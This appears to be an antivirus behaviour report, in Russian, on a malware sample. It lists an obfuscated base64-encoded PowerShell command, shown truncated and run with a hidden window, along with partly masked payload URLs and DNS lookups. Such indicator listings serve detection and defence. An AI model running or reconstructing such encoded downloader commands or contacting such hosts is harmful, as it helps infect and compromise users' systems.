Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFYAUABaAFYAZgBsAGwAPQAnAEsATwBGAEEAUAByAHkAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwB1AGAAUgBpAHQAWQBgAFAAUgBgAE8AdABvAEMATwBMACIAIAA9AC...
- http://se####svanity.com/cgi-bin/t7_yk8dm_xlwu9/
- http://www.de#####seadvocaten.com/cariboost_files/55_l9l_y/
- http://kj##ller.nu/custom/m9_2_4pqr/
- http://fl####lfaltd10.com/dist/9mn_uj7ft_9i11k6xa75/
- DNS ASK se####svanity.com
- DNS ASK de#####seadvocaten.com
- DNS ASK li##aris.ch
- DNS ASK kj##ller.nu
- DNS ASK fl####lfaltd10.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFYAUABaAFYAZgBsAGwAPQAnAEsATwBGAEEAUAByAHkAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwB1AGAAUgBpAHQAWQBgAFAAUgBgAE8AdABvAEMATwBMACIAIAA9AC...' (со скрытым окном)